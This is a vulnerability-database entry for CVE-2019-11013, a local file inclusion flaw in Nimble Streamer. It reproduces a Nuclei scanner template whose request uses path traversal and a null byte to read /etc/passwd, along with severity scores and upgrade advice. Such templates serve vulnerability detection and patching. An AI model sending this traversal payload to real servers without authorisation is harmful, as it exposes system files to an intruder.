Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-11013
HistorySep 05, 2021 - 3:10 a.m.

Nimble Streamer <=3.5.4-9 - Local File Inclusion

2021-09-0503:10:02
ProjectDiscovery
github.com
8
cve
lfi
nimble
exploit-db
packetstorm
softvelum

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

EPSS

0.058

Percentile

93.5%

Nimble Streamer 3.0.2-2 through 3.5.4-9 is vulnerable to local file inclusion. An attacker can traverse the file system to access files or directories that are outside of the restricted directory on the remote server.

id: CVE-2019-11013

info:
  name: Nimble Streamer <=3.5.4-9 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: Nimble Streamer 3.0.2-2 through 3.5.4-9 is vulnerable to local file inclusion. An attacker can traverse the file system to access files or directories that are outside of the restricted directory on the remote server.
  impact: |
    The LFI vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further exploitation of the system.
  remediation: |
    Upgrade Nimble Streamer to a version higher than 3.5.4-9 to mitigate the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47301
    - https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/
    - http://packetstormsecurity.com/files/154196/Nimble-Streamer-3.x-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-11013
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2019-11013
    cwe-id: CWE-22
    epss-score: 0.01775
    epss-percentile: 0.87745
    cpe: cpe:2.3:a:softvelum:nimble_streamer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: softvelum
    product: nimble_streamer
  tags: cve,cve2019,lfi,nimble,edb,packetstorm,softvelum

http:
  - method: GET
    path:
      - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a00463044022078af9e78f6d5477e6f10816ab107f8364ee3ffb2558d11d3e471da5cf9dbfbd002206c1d20af586ce07de95301dde8cbdf2ada184610b59fb1b0829d77c81dc705e0:922c64590222798bb761d5b6d8e72950

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

EPSS

0.058

Percentile

93.5%